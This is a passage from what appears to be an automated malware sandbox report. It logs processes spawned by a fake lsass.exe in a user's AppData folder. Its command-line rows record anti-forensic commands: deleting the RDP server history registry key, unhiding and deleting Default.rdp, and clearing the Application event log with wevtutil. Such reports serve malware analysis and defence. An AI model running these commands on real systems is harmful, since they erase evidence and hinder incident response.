1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121165 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17856037758 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #28: reg.exe
42
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x828 |
| Parent PID | 0x3c0 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7BC
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
6 | |
| Write | STD_ERROR_HANDLE | size = 7 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 67 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x7d0000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121243 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17864747153 |
|
1 |
Process #29: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7c8 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
798
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0x8ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4aa20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121368 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17877716261 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #30: reg.exe
36
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8ac |
| Parent PID | 0x7c8 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
894
|
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers | size = 2, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x580000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121462 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17886683032 |
|
1 |
Process #31: cmd.exe
61
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d0 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
87C
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\attrib.exe | os_pid = 0x868, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a510000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121571 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17898249259 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = userprofile, result_out = C:\Users\5p5NrGJn0jS HALPmcxz |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #32: attrib.exe
4
0
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\windows\syswow64\attrib.exe |
| Command Line | attrib "C:\Users\5p5NrGJn0jS HALPmcxz\documents\Default.rdp" -s -h |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x868 |
| Parent PID | 0x8d0 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8D4
|
Host Behavior
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\attrib.exe | base_address = 0xcf0000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121680 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17917229586 |
|
1 |
Process #33: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f8 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8F0
|
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\documents\Default.rdp | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\documents | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 68 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4aa00000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121789 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17930253088 |
|
1 |
Environment (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = userprofile, result_out = C:\Users\5p5NrGJn0jS HALPmcxz |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #34: cmd.exe
61
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:00, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x974 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
978
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | wevtutil.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wevtutil.exe | os_pid = 0x90c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
